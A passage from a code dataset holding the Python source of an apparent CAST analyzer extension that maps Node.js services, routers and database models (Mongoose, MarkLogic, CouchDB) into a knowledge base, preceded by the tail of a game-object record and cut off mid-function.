\"cargoMultiplier\" in upgradeDict else 1.0,\n maxSecondaries=upgradeDict[\"maxSecondaries\"] if \"maxSecondaries\" in upgradeDict else 0,\n maxSecondariesMultiplier=upgradeDict[\"maxSecondariesMultiplier\"] \\\n if \"maxSecondariesMultiplier\" in upgradeDict else 1.0,\n handling=upgradeDict[\"handling\"] if \"handling\" in upgradeDict else 0,\n handlingMultiplier=upgradeDict[\"handlingMultiplier\"] \\\n if \"handlingMultiplier\" in upgradeDict else 1.0,\n maxPrimaries=upgradeDict[\"maxPrimaries\"] if \"maxPrimaries\" in upgradeDict else 0,\n maxPrimariesMultiplier=upgradeDict[\"maxPrimariesMultiplier\"] \\\n if \"maxPrimariesMultiplier\" in upgradeDict else 1.0,\n maxTurrets=upgradeDict[\"maxTurrets\"] if \"maxTurrets\" in upgradeDict else 0,\n maxTurretsMultiplier=upgradeDict[\"maxTurretsMultiplier\"] \\\n if \"maxTurretsMultiplier\" in upgradeDict else 1.0,\n maxModules=upgradeDict[\"maxModules\"] if \"maxModules\" in upgradeDict else 0,\n maxModulesMultiplier=upgradeDict[\"maxModulesMultiplier\"] \\\n if \"maxModulesMultiplier\" in upgradeDict else 1.0,\n vendor=upgradeDict[\"vendor\"] if \"vendor\" in upgradeDict else \"\",\n builtIn=False)\n","sub_path":"bot/gameObjects/shipUpgrade.py","file_name":"shipUpgrade.py","file_ext":"py","file_size_in_byte":14629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"392231025","text":"import cast.analysers.ua\nfrom cast.analysers import Bookmark, create_link, log\nfrom cast.application import open_source_file # @UnresolvedImport\nfrom nodejs_parser import analyse, create_link_nodeJS\nfrom server_analysis import LoopBackAnalysis, SailsAnalysis, SailsJSApplications\nfrom collections import OrderedDict\nfrom symbols import Violations, PotentialController, ExternalLibrary, nodejs_open_source_file\nfrom microservice_analysis import Seneca\nimport traceback\nimport os\nimport json\nfrom cast import Event\nfrom collections import defaultdict\n\nfrom data_support_analysis import Knexsupport\nfrom AMPQ_analysis import MQTT\n\ndef get_short_uri(uri):\n shortUri = uri\n if '?' 
in uri:\n shortUri = uri[:uri.find('?')]\n if shortUri.endswith('/'):\n shortUri = shortUri[:-1]\n return shortUri\n \nclass NodeJS(cast.analysers.ua.Extension):\n\n class ParsingResults:\n\n def __init__(self):\n self.requires = []\n self.services = []\n self.httpRequests = []\n self.mongooseConnections = []\n self.mongooseModels = []\n self.dbConnections = []\n self.marklogicDatabases = []\n self.couchdbDatabases = []\n self.couchdbCalls = []\n self.violations = Violations()\n self.isApplication = False\n self.potentialExpressControllerClasses = []\n self.potentialExpressControllerRoutesFCall = []\n self.externalLibraries = {}\n self.externalLibrariesFunctionCalls = {}\n self.externalLibrariesMethodCalls = {}\n\n # loopback flag infos\n self.LoopbackServer = False\n self.loopbackRemoteMethods = []\n self.linkSuspensions = []\n\n # Sails info\n self.database_sails = None\n self.models_sails = []\n self.model_infos = []\n self.service_sails = []\n self.action_sails = []\n self.table_name = {}\n self.adapter_sql = {}\n self.function_sql = defaultdict(list)\n\n # Knex\n self.knex_require = False\n self.bookshelf_require = False\n self.model_knex_infos = []\n self.knex_config = None\n\n # mqtt\n self.mqtt_require = False\n self.mqtt_methods = []\n self.mqtt_events = []\n \n # package.json dependencies have info of nodejs project.\n self.is_node_project = False\n\n # seneca-micro-service\n self.seneca_require = False\n self.seneca_uses = []\n self.add_call = []\n self.act_call = []\n\n \"\"\"\n Parse .js files and create NodeJS services.\n \"\"\"\n def __init__(self):\n \n self.bFirstJabascriptFileAnalysis = True\n self.currentFile = None\n self.currentSourceCode = None\n self.currentFilename = None\n self.mongooseConnectionsByName = {}\n self.mongooseConnectionsByAst = {}\n self.mongooseModelsByConnectionByName = {}\n# self.marklogicDatabasesByConnectionVariable = {}\n self.nbOperations = 0\n self.nbMongooseModels = 0\n self.nbMarklogicDatabases = 0\n self.nbMarklogicCollections = 0\n self.nbCouchDBDatabases = 0\n self.nbDbAccesses = 0\n self.nbApplications = 0\n self.unknownTablesByName = {}\n self.httpRequestGuids = {}\n self.servicesByFilename = {}\n self.nodejsVersionsByDirname = {}\n\n jsonPath = os.path.abspath(os.path.join(os.path.dirname(__file__), 'config.json'))\n self.config = json.loads(nodejs_open_source_file(jsonPath))\n\n self.marklogicDatabasesByConnectionParameter = {}\n\n self.parsingResultsToKeepByJSContent = OrderedDict()\n\n self.potentialExpressControllers = OrderedDict()\n self.potentialExpressControllerRoutesFCall = []\n\n self.externalLibrariesParent = None\n self.externalLibraries = {}\n\n self.jsonFilesByPathname = {}\n self.loopback_analysis = LoopBackAnalysis()\n self.potentialLoopbackServerFiles = []\n self.nbLoopbackModels = 0\n\n # Sails\n self.sails_apps = SailsJSApplications()\n\n # Knex support\n self.knex_support = Knexsupport()\n \n # mqtt\n self.mqtt = MQTT()\n\n # seneca\n self.seneca = Seneca()\n\n self.node_project_path = ''\n\n @Event('com.castsoftware.html5', 'start_json_content')\n def start_json_content(self, file):\n\n filename = file.get_path()\n if filename.lower().endswith('middleware.json'):\n self.loopback_analysis.search_for_loopback_application(filename)\n\n if not filename.lower().endswith('package.json'):\n self.jsonFilesByPathname[filename] = file\n return\n \n try:\n\n '''\n * package.json resolution\n '''\n jsonContent = json.loads(nodejs_open_source_file(filename))\n if 'engines' in jsonContent:\n if 'node' in 
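# --- Aside: the 'engines' lookup above boils down to two nested key checks on
# the parsed package.json; a standalone sketch (the inline manifest is
# illustrative):
import json

manifest = json.loads('{"name": "demo", "engines": {"node": ">=12.0.0"}}')
node_version = manifest.get('engines', {}).get('node')
print(node_version)  # >=12.0.0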
jsonContent['engines']:\n file.save_property('sourceFile.html5', 1)\n nodeVersion = jsonContent['engines']['node']\n parentDir = os.path.dirname(filename)\n bm = Bookmark(file, 1, 1, 1, 1)\n try:\n enginesFound = False\n nodeFound = False\n infile = open_source_file(filename)\n nLine = 1\n for line in infile:\n if '\"engines\"' in line:\n enginesFound = True\n if '\"node\"' in line:\n nodeFound = True\n elif enginesFound:\n if '\"node\"' in line:\n nodeFound = True\n if nodeFound:\n index = line.find(\"node\")\n indexBegin = line.find('\"', index + 6)\n if indexBegin:\n indexEnd = line.find('\"', indexBegin + 1)\n else:\n indexEnd = -1\n if indexEnd > 0:\n bm = Bookmark(file, nLine, indexBegin + 2, nLine, indexEnd + 1)\n break\n nLine += 1\n infile.close()\n except:\n log.debug(traceback.format_exc())\n self.nodejsVersionsByDirname[parentDir] = { 'version': nodeVersion.strip(), 'position' : bm }\n log.info('NodeJS version (' + str(nodeVersion) + ') found in ' + file.get_path())\n \n def is_node_dependencies(json_content):\n is_node_dependencies = ['express', 'hapi', 'sail', 'loopback', 'koa', 'seneca']\n\n for elm in is_node_dependencies:\n if elm in json_content['dependencies']:\n return True\n\n return False\n\n if 'name' in jsonContent and 'main' in jsonContent and 'dependencies' in jsonContent and is_node_dependencies(jsonContent):\n self.node_project_path = filename.replace('package.json', '')\n\n '''\n * .sailrc file detection.\n '''\n\n sail_config = filename.replace('package.json', '.sailsrc')\n routes_config = filename.replace('package.json', 'config\\\\routes.js')\n api_controler = filename.replace('package.json', 'api\\\\controllers')\n api_models = filename.replace('package.json', 'api\\\\models')\n is_sails = os.path.exists(sail_config) and os.path.exists(routes_config) and os.path.exists(api_controler)\n\n if is_sails:\n fullname = os.path.abspath(sail_config.replace('\\\\.sailsrc', ''))\n name = fullname.split('\\\\')[-1]\n sails_app = SailsAnalysis(fullname, name)\n\n if api_models:\n list_models = os.listdir(api_models)\n sails_app.set_list_models(list_models)\n\n self.sails_apps.append(sails_app)\n\n except:\n log.debug(traceback.format_exc())\n\n @Event('com.castsoftware.html5', 'start_analysis_root')\n def start_analysis_root(self, rootDir):\n log.info('start root analysis ' + rootDir)\n self.currentFile = None\n self.currentSourceCode = None\n self.currentFilename = None\n\n @Event('com.castsoftware.html5', 'end_analysis_root')\n def end_analysis_root(self, rootDir):\n log.info('end root analysis ' + rootDir)\n \n def process_before_javascript_analyses(self):\n for pathname, jsonFile in self.jsonFilesByPathname.items():\n dirname = os.path.dirname(pathname)\n self.loopback_analysis.process(dirname, jsonFile)\n\n @Event('com.castsoftware.html5', 'start_javascript_content')\n def start_javascript_content(self, jsContent):\n\n self.loopback_analysis.jsContent = jsContent\n \n if self.bFirstJabascriptFileAnalysis:\n self.process_before_javascript_analyses()\n self.bFirstJabascriptFileAnalysis = False\n \n self.currentFile = jsContent.get_file()\n self.currentFilename = os.path.abspath(self.currentFile.get_path())\n self.currentSourceCode = jsContent.kbObject\n \n versions = None\n for dirName, version in self.nodejsVersionsByDirname.items():\n if self.currentFilename.startswith(dirName):\n if versions == None:\n versions = []\n versions.append(version)\n \n parsingResults = self.ParsingResults()\n\n sails_app = self.sails_apps.get_server_from_path(self.currentFilename)\n 
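# --- Aside: the Sails detection above checks for sibling marker files next to
# package.json. A portable sketch of the same test (the original builds the
# paths with literal Windows '\\' separators; os.path.join avoids that):
import os

def looks_like_sails_app(package_json_path):
    root = os.path.dirname(package_json_path)
    markers = ('.sailsrc',
               os.path.join('config', 'routes.js'),
               os.path.join('api', 'controllers'))
    return all(os.path.exists(os.path.join(root, m)) for m in markers)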
if sails_app:\n parsingResults.models_sails = sails_app.list_models\n parsingResults.database_sails = sails_app.database_sails\n parsingResults.table_name = sails_app.table_name\n parsingResults.adapter_sql = sails_app.adapter_sql\n parsingResults.function_sql = sails_app.function_sql\n parsingResults.is_node_project = True\n\n if not parsingResults.is_node_project and self.node_project_path and '\\\\client\\\\' not in self.currentFilename:\n parsingResults.is_node_project = self.node_project_path in self.currentFilename\n\n parsingResults.LoopbackServer = self.loopback_analysis.server\n\n try:\n analyse(jsContent, self.config, self.loopback_analysis, parsingResults, self.currentFile, versions)\n except:\n pass\n \n '''\n * Create model.\n * Sails save model infos, service infos...\n ''' \n \n if sails_app:\n for model in sails_app.list_models:\n name_model = '\\\\api\\\\models\\\\' + model + '.js'\n if name_model in self.currentFilename and model not in sails_app.model_objects.keys():\n sails_app.model_objects[model] = jsContent\n \n for service in parsingResults.service_sails:\n service.parent = jsContent.kbObject\n sails_app.append_services(service)\n\n sails_app.extend_model_infos(parsingResults.model_infos, jsContent.get_kb_object())\n sails_app.extend_actions(parsingResults.action_sails)\n\n if '\\\\api\\\\controllers' in self.currentFilename:\n sails_app.append_controllers(jsContent)\n \n if self.currentFilename.endswith('app.js'):\n sail_src = self.currentFilename.replace('app.js', '.sailsrc')\n if os.path.exists(sail_src):\n kb = self.create_application(jsContent)\n sails_app.set_kb(kb)\n \n if not sails_app.database_sails and parsingResults.database_sails:\n sails_app.database_sails = parsingResults.database_sails\n \n '''\n * express, hapi, loopback\n '''\n if parsingResults.isApplication:\n self.create_application(jsContent)\n if parsingResults.LoopbackServer and not self.loopback_analysis.server:\n self.create_loopback_server(jsContent)\n self.loopback_analysis.server = True\n for loopbackRemoteMethod in parsingResults.loopbackRemoteMethods:\n self.loopback_analysis.create_loopback_operation(loopbackRemoteMethod[0], loopbackRemoteMethod[1], loopbackRemoteMethod[2], loopbackRemoteMethod[3], jsContent.get_kb_object(), self.currentFile, loopbackRemoteMethod[4], loopbackRemoteMethod[5], loopbackRemoteMethod[6])\n for linkSuspension in parsingResults.linkSuspensions:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, linkSuspension.callee, linkSuspension.callPart.create_bookmark(self.currentFile))\n\n for name, ast in parsingResults.externalLibraries.items():\n self.create_external_library(name, ast, \\\n parsingResults.externalLibrariesFunctionCalls[name] if name in parsingResults.externalLibrariesFunctionCalls else [], \\\n parsingResults.externalLibrariesMethodCalls[name] if name in parsingResults.externalLibrariesMethodCalls else [])\n \n if parsingResults.potentialExpressControllerClasses:\n for cl in parsingResults.potentialExpressControllerClasses:\n self.potentialExpressControllers[cl] = PotentialController(cl, jsContent.get_file()) \n if parsingResults.potentialExpressControllerRoutesFCall:\n self.potentialExpressControllerRoutesFCall.extend(parsingResults.potentialExpressControllerRoutesFCall)\n \n for service in parsingResults.services:\n filename = self.currentFile.get_path()\n if filename in self.servicesByFilename:\n l = self.servicesByFilename[filename]\n else:\n l = []\n self.servicesByFilename[filename] = l\n service.sourceCode = 
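# --- Aside: the "fetch the list or create it" bookkeeping used above for
# servicesByFilename is the classic use case for defaultdict(list); a
# standalone sketch:
from collections import defaultdict

services_by_filename = defaultdict(list)
services_by_filename['api/users.js'].append('GET /users')
services_by_filename['api/users.js'].append('POST /users')
print(dict(services_by_filename))  # {'api/users.js': ['GET /users', 'POST /users']}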
self.currentSourceCode\n l.append(service)\n for dbConnection in parsingResults.dbConnections:\n self.create_database_accesses(dbConnection)\n for httpRequest in parsingResults.httpRequests:\n self.create_http_request(httpRequest)\n \n if parsingResults.couchdbDatabases or parsingResults.marklogicDatabases or parsingResults.mongooseConnections or parsingResults.mongooseModels:\n self.parsingResultsToKeepByJSContent[jsContent] = parsingResults\n \n parsingResults.violations.save()\n\n # Save all infos\n\n # knex save info:\n self.knex_support.set_infos(parsingResults)\n\n # mqtt save infos\n self.mqtt.set_infos(parsingResults)\n\n # seneca save infos\n self.seneca.set_infos(parsingResults, jsContent)\n\n @Event('com.castsoftware.html5', 'end_javascript_contents')\n def end_javascript_contents(self):\n \n guids = {}\n couchDBByName = {}\n\n mongooseModelsByIdentifier = {}\n \n for _, parsingResults in self.parsingResultsToKeepByJSContent.items():\n for mongooseModel in parsingResults.mongooseModels:\n if mongooseModel.variableIdentifier:\n mongooseModelsByIdentifier[mongooseModel.variableIdentifier] = mongooseModel\n \n for jsContent, parsingResults in self.parsingResultsToKeepByJSContent.items():\n \n for marklogicDatabase in parsingResults.marklogicDatabases:\n try:\n self.create_marklogic_database(marklogicDatabase, jsContent, guids)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n \n for mongooseConnection in parsingResults.mongooseConnections:\n try:\n self.create_mongoose_connection(mongooseConnection, jsContent)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n for mongooseModel in parsingResults.mongooseModels:\n try:\n self.create_mongoose_model(mongooseModel, jsContent, mongooseModelsByIdentifier, guids)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n for couchdbDatabase in parsingResults.couchdbDatabases:\n try:\n self.create_couchdb_database(couchdbDatabase, jsContent, guids, couchDBByName)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n for couchdbCall in parsingResults.couchdbCalls:\n try:\n self.create_couchdb_call(couchdbCall, couchDBByName, jsContent)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n\n guids = {} # contains guids as key and number as value to avoid duplicated guids\n for file_name, services in self.servicesByFilename.items():\n for service in services:\n if service.routerReference:\n serviceDirname = os.path.dirname(service.sourceCode.parent.get_path())\n# routerDirname = os.path.abspath(os.path.join(serviceDirname, service.routerReference) + '.js')\n if isinstance(service.routerReference, str):\n routerDirname = os.path.abspath(os.path.join(serviceDirname, service.routerReference) + '.js')\n else:\n try:\n routerDirname = service.routerReference.get_file().get_path()\n except:\n routerDirname = ''\n if routerDirname in self.servicesByFilename:\n routerServices = self.servicesByFilename[routerDirname]\n for routerService in routerServices:\n if routerService.isRouter:\n self.create_operation(routerService, guids, service.get_uri_evaluation())\n else:\n self.create_operation(service, guids)\n\n elif service.koa_router:\n if service.koa_use:\n def uri_real(router_info, url):\n try:\n router = router_info.get_resolutions()[0].callee\n\n if 
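# --- Aside: resolving routerReference above amounts to joining a relative
# module path onto the requiring file's directory and appending '.js'; a
# standalone sketch (the paths are illustrative, shown for a POSIX layout):
import os

def resolve_router(source_path, reference):
    base = os.path.dirname(source_path)
    return os.path.abspath(os.path.join(base, reference) + '.js')

print(resolve_router('/app/server.js', './routes/users'))  # /app/routes/users.js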
not router.is_identifier():\n\n return False\n\n while not router.is_js_content():\n router = router.parent\n \n routerDirname = router.get_file().get_path()\n\n if routerDirname not in self.servicesByFilename.keys():\n return False\n routerServices = self.servicesByFilename[routerDirname]\n \n if file_name == routerDirname:\n for routerService in routerServices:\n log.debug('final -----' + (url))\n self.create_operation(routerService, guids, url)\n return\n \n for routerService in routerServices:\n old_url = url\n if routerService.koa_router and not routerService.isRouter:\n url = url + routerService.get_uri_evaluation()\n if not uri_real(routerService.koa_router, url):\n url = old_url\n \n elif routerService.koa_router and routerService.isRouter:\n self.create_operation(routerService, guids, url)\n\n url = old_url\n\n return True\n\n except:\n return False\n\n uri_real(service.koa_router, '')\n\n elif not service.isRouter:\n self.create_operation(service, guids)\n \n self.create_express_controllers()\n \n self.sails_apps.compute()\n self.knex_support.compute()\n self.mqtt.compute()\n self.seneca.compute()\n\n self.nbOperations = self.nbOperations + self.loopback_analysis.nbOperations_loop_back\n\n log.info(str(self.nbApplications) + ' NodeJS applications created.')\n log.info(str(self.nbOperations) + ' NodeJS web service operations created.')\n log.info(str(self.nbMongooseModels) + ' NodeJS mongoose models created.')\n log.info(str(self.nbDbAccesses) + ' NodeJS database accesses found.')\n log.info(str(self.nbMarklogicDatabases) + ' NodeJS marklogic databases created.')\n log.info(str(self.nbMarklogicCollections) + ' NodeJS marklogic collections created.')\n log.info(str(self.nbCouchDBDatabases) + ' NodeJS CouchDB databases created.')\n log.info(str(self.loopback_analysis.nbLoopbackModels) + ' NodeJS loopback models created.')\n \n def create_express_controllers(self):\n guids = {}\n for potentialExpressControllerRoutesFCall in self.potentialExpressControllerRoutesFCall:\n parentClass = potentialExpressControllerRoutesFCall.ast.parent\n while parentClass and hasattr(parentClass, 'is_class') and not parentClass.is_class():\n parentClass = parentClass.parent\n if parentClass:\n if parentClass in self.potentialExpressControllers:\n ctrl = self.potentialExpressControllers[parentClass]\n if not ctrl.kbObject:\n self.create_express_controller(ctrl)\n potentialExpressControllerRoutesFCall.sourceCode = parentClass.parent\n self.create_operation(potentialExpressControllerRoutesFCall, guids, None, ctrl.kbObject)\n\n def create_express_controller(self, ctrl):\n \n ctrl_object = cast.analysers.CustomObject()\n ctrl.kbObject = ctrl_object\n ctrl_object.set_name(ctrl.cl.get_name())\n ctrl_object.set_parent(ctrl.cl.get_kb_object())\n fullname = ctrl.cl.get_kb_object().guid + '/EXPRESS_CTRL'\n displayfullname = ctrl.cl.get_kb_object().fullname + '/EXPRESS_CTRL'\n ctrl_object.set_fullname(displayfullname)\n ctrl_object.set_guid(fullname)\n ctrl_object.set_type('CAST_NodeJS_Express_Controller')\n ctrl_object.save()\n ctrl_object.save_position(ctrl.cl.create_bookmark(ctrl.file))\n \n def normalize_path(self, operationPath):\n\n service_names = operationPath.split('/')\n service_name = None\n if service_names:\n service_name = ''\n for part in service_names:\n if part: \n if part.startswith('{') or part.startswith(':'):\n service_name += '{}/'\n else:\n service_name += ( part + '/' )\n return service_name\n\n def create_single_operation(self, service, guids, routedUrl, operationName, localGuids, 
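# --- Aside: uri_real above accumulates router prefixes while walking nested
# koa routers; a self-contained sketch of that flattening over a toy routing
# table (the table data is illustrative):
routers = {
    'app':   [('use', '/api', 'v1')],
    'v1':    [('use', '/v1', 'users'), ('get', '/health', None)],
    'users': [('get', '/users/:id', None)],
}

def flatten(name, prefix=''):
    out = []
    for verb, path, child in routers[name]:
        if child:
            # nested router: extend the accumulated prefix and recurse
            out += flatten(child, prefix + path)
        else:
            out.append((verb.upper(), prefix + path))
    return out

print(flatten('app'))  # [('GET', '/api/v1/users/:id'), ('GET', '/api/health')]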
parentKbObject = None):\n\n operationType = service.type\n handler = service.handler\n ast = service.ast\n \n try:\n routedUrl = routedUrl.replace('****', '')\n except:\n pass\n if routedUrl:\n if operationName.startswith('/'):\n operationName = routedUrl + operationName[1:]\n else:\n operationName = routedUrl + operationName\n\n if not operationName:\n operationName = '/'\n \n name = operationName.replace('****', '')\n if name == '/':\n if parentKbObject:\n fullname = parentKbObject.guid + '/' + operationType + '/'\n displayfullname = parentKbObject.fullname + '.' + operationType + '.'\n else:\n fullname = service.sourceCode.guid + '/' + operationType + '/'\n displayfullname = service.sourceCode.fullname + '.' + operationType + '.'\n else:\n if parentKbObject:\n fullname = parentKbObject.guid + '/' + operationType + '/' + name\n displayfullname = parentKbObject.fullname + '.' + operationType + '.' + name\n else:\n fullname = service.sourceCode.guid + '/' + operationType + '/' + name\n displayfullname = service.sourceCode.fullname + '.' + operationType + '.' + name\n \n if not localGuids or not fullname in localGuids:\n\n if fullname in guids:\n nr = guids[fullname]\n guids[fullname] = nr + 1\n fullname += ('_' + str(nr + 1))\n try:\n service.sourceCode.save_violation('CAST_NodeJS_Metric_MultipleRoutesForSamePath.numberOfMultipleRoutesForSamePath', ast.create_bookmark(service.sourceCode.parent))\n except:\n pass\n else:\n guids[fullname] = 0\n if service.inLoop and not '****' in operationName:\n try:\n service.sourceCode.save_violation('CAST_NodeJS_Metric_MultipleRoutesForSamePath.numberOfMultipleRoutesForSamePath', ast.create_bookmark(service.sourceCode.parent))\n except:\n pass\n\n operation_object = cast.analysers.CustomObject()\n operation_object.set_name(name)\n if parentKbObject:\n operation_object.set_parent(parentKbObject)\n else:\n operation_object.set_parent(service.sourceCode)\n operation_object.set_fullname(displayfullname)\n operation_object.set_guid(fullname)\n if localGuids != None:\n localGuids.append(fullname)\n \n linkType = 'fireLink'\n if operationType == 'delete':\n linkType = 'fireDeleteLink'\n operation_object.set_type('CAST_NodeJS_DeleteOperation')\n elif operationType == 'put':\n linkType = 'fireUpdateLink'\n operation_object.set_type('CAST_NodeJS_PutOperation')\n elif operationType == 'post':\n linkType = 'fireUpdateLink'\n operation_object.set_type('CAST_NodeJS_PostOperation')\n elif operationType == 'use':\n linkType = 'fireLink'\n operation_object.set_type('CAST_NodeJS_UseOperation')\n else:\n linkType = 'fireSelectLink'\n operation_object.set_type('CAST_NodeJS_GetOperation')\n operation_object.save()\n operation_object.save_position(ast.create_bookmark(service.sourceCode.parent))\n operation_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n log.debug('create_operation ' + fullname)\n\n self.nbOperations += 1\n\n if not handler:\n return\n\n if handler.get_kb_symbol():\n create_link_nodeJS(linkType, operation_object, handler.kbObject, handler.create_bookmark(service.sourceCode.parent))\n elif handler.get_resolutions():\n for resolution in handler.resolutions:\n if resolution.callee and resolution.callee.get_kb_object():\n create_link_nodeJS(linkType, operation_object, resolution.callee.get_kb_object(), handler.create_bookmark(service.sourceCode.parent))\n\n def create_operation(self, service, guids, routedUrl = None, parentKbObject = None):\n\n operationName = service.get_uri_evaluation()\n if type(operationName) is list:\n 
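# --- Aside: the fullname collision handling in create_single_operation keeps
# the first occurrence unsuffixed and numbers later duplicates; a minimal
# standalone restatement of that rule:
def unique_guid(fullname, guids):
    if fullname in guids:
        guids[fullname] += 1
        return fullname + '_' + str(guids[fullname])
    guids[fullname] = 0
    return fullname

guids = {}
print(unique_guid('file.js/get/users', guids))  # file.js/get/users
print(unique_guid('file.js/get/users', guids))  # file.js/get/users_1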
localGuids = []\n for opName in operationName:\n if type(routedUrl) is list:\n for routed in routedUrl:\n self.create_single_operation(service, guids, routed, opName, localGuids, parentKbObject)\n else:\n self.create_single_operation(service, guids, routedUrl, opName, localGuids, parentKbObject)\n else:\n if type(routedUrl) is list:\n for routed in routedUrl:\n self.create_single_operation(service, guids, routed, operationName, None, parentKbObject)\n else:\n self.create_single_operation(service, guids, routedUrl, operationName, None, parentKbObject)\n\n def create_mongoose_connection(self, mongooseConnection, jsContent):\n \n evs = self.evaluate_nosql_name(mongooseConnection.url)\n# if not evs:\n# ident = None\n# try:\n# if mongooseConnection.url.resolutions:\n# ident = mongooseConnection.url.resolutions[0].callee\n# except:\n# pass\n# if not ident:\n# ident = mongooseConnection.url\n# if ident and ident.is_identifier():\n# evs.append(ident.get_name())\n \n for url in evs:\n\n if mongooseConnection.name:\n url = mongooseConnection.name + '/' + url\n \n if url in self.mongooseConnectionsByName:\n continue\n \n self.mongooseConnectionsByName[url] = mongooseConnection\n self.mongooseConnectionsByAst[mongooseConnection.ast] = mongooseConnection\n \n ast = mongooseConnection.ast\n \n mongooseConnection_object = cast.analysers.CustomObject()\n mongooseConnection.kb_symbol = mongooseConnection_object\n \n mongooseConnection_object.set_name(url)\n mongooseConnection_object.set_parent(jsContent.get_kb_object())\n fullname = jsContent.file.get_path() + '/CAST_NodeJS_MongoDB_Connection/' + url\n displayfullname = jsContent.file.get_path() + '.CAST_NodeJS_MongoDB_Connection.' + url\n mongooseConnection.fullname = fullname\n mongooseConnection_object.set_fullname(displayfullname)\n mongooseConnection_object.set_guid(fullname)\n mongooseConnection_object.set_type('CAST_NodeJS_MongoDB_Connection')\n mongooseConnection_object.save()\n mongooseConnection_object.save_position(ast.create_bookmark(jsContent.file))\n mongooseConnection_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n log.debug('create_mongodb_connection ' + fullname)\n\n def evaluate_nosql_name(self, identName):\n \n evs = identName.evaluate()\n\n if not evs:\n callee = None\n try:\n if identName.resolutions:\n callee = identName.resolutions[0].callee\n except:\n pass\n if not callee:\n callee = identName\n if callee and callee.is_identifier():\n \"\"\"\n var config = { collection: 'myCollection' }\n var collectionName = config.collection\n \n If config.collection is resolved to config, then we keep config as name for collection, and not config.\n \"\"\"\n try:\n identFullname = identName.get_fullname()\n if '.' 
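# --- Aside: create_operation fans a list-valued URI and a list-valued routed
# prefix out to one operation per combination; the same cross product in
# isolation:
def fan_out(names, prefixes):
    names = names if isinstance(names, list) else [names]
    prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
    return [(prefix, name) for name in names for prefix in prefixes]

print(fan_out(['/a', '/b'], ['/api', '/admin']))
# [('/api', '/a'), ('/admin', '/a'), ('/api', '/b'), ('/admin', '/b')]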
in identFullname and identFullname.startswith(callee.get_name()):\n evs.append(identName.get_name())\n else:\n evs.append(callee.get_name())\n except:\n evs.append(callee.get_name())\n return evs\n \n def create_mongoose_model(self, mongooseModel, jsContent, mongooseModelsByIdentifier, guids):\n\n def get_model_by_name(name):\n for model in mongooseModelsByIdentifier.values():\n if model.name.get_text() == name.get_text():\n return model\n return None\n\n caller_id = mongooseModel.callerIdentifier\n if caller_id:\n realMongooseModel = None\n try:\n if caller_id in mongooseModelsByIdentifier:\n realMongooseModel = mongooseModelsByIdentifier[caller_id]\n \n elif caller_id.is_function_call():\n callpart = caller_id.get_function_call_parts()[0]\n \n if not callpart.get_name() == 'model':\n return\n \n name_model = callpart.get_parameters()[0]\n realMongooseModel = get_model_by_name(name_model)\n \n except:\n log.warning('can not resolve identifier caller')\n return\n\n if not realMongooseModel:\n return\n\n if not realMongooseModel.kb_symbol:\n self.create_mongoose_model(realMongooseModel, realMongooseModel.jsContent, mongooseModelsByIdentifier, guids)\n\n if not realMongooseModel.kb_symbol:\n return\n\n for linkSuspension in mongooseModel.linkSuspensions:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, realMongooseModel.kb_symbol, linkSuspension.callPart.create_bookmark(jsContent.file))\n return\n \n if mongooseModel.kb_symbol:\n return\n \n if mongooseModel.fcallpartConnection in self.mongooseConnectionsByAst:\n parent = self.mongooseConnectionsByAst[mongooseModel.fcallpartConnection].get_kb_object()\n# fullnamePrefix = self.mongooseConnectionsByAst[mongooseModel.fcallpartConnection].fullname\n else:\n parent = jsContent.get_kb_object()\n fullnamePrefix = jsContent.file.get_path() + '/CAST_NodeJS_MongoDB_Collection'\n displayfullnamePrefix = jsContent.file.get_path() + '.CAST_NodeJS_MongoDB_Collection'\n\n if mongooseModel.name:\n evs = self.evaluate_nosql_name(mongooseModel.name)\n else:\n evs = []\n \n for name in evs:\n\n if mongooseModel.fcallpartConnection in self.mongooseModelsByConnectionByName and name in self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection]:\n \n modelReference = self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection][name]\n\n else:\n \n modelReference = mongooseModel\n if mongooseModel.fcallpartConnection in self.mongooseModelsByConnectionByName:\n l = self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection]\n else:\n l = {}\n self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection] = l\n l[name] = mongooseModel\n \n ast = mongooseModel.ast\n \n mongooseModel_object = cast.analysers.CustomObject()\n mongooseModel.kb_symbol = mongooseModel_object\n \n mongooseModel_object.set_name(name)\n mongooseModel_object.set_parent(parent)\n fullname = fullnamePrefix + '/' + name\n displayfullname = displayfullnamePrefix + '.' 
+ name\n\n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n mongooseModel_object.set_fullname(displayfullname)\n mongooseModel_object.set_guid(fullname)\n mongooseModel_object.set_type('CAST_NodeJS_MongoDB_Collection')\n mongooseModel_object.save()\n mongooseModel_object.save_position(ast.create_bookmark(jsContent.file))\n mongooseModel_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n log.debug('create_mongodb_model ' + fullname)\n self.nbMongooseModels += 1\n \n for linkSuspension in mongooseModel.linkSuspensions:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, modelReference.kb_symbol, linkSuspension.callPart.create_bookmark(jsContent.file))\n \n def create_marklogic_database(self, marklogicDatabase, jsContent, guids):\n \n if marklogicDatabase.connectionParameter in self.marklogicDatabasesByConnectionParameter:\n db = self.marklogicDatabasesByConnectionParameter[marklogicDatabase.connectionParameter]\n marklogicDatabase_object = db.kb_symbol\n marklogicDatabase.referencedDatabase = db\n marklogicDatabase.kb_symbol = marklogicDatabase_object\n else:\n self.marklogicDatabasesByConnectionParameter[marklogicDatabase.connectionParameter] = marklogicDatabase\n marklogicDatabase_object = None\n \n ast = 